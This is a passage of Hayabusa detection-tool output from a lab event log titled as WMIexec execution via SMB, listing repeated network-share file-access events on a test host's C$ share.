Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 : IP Address: 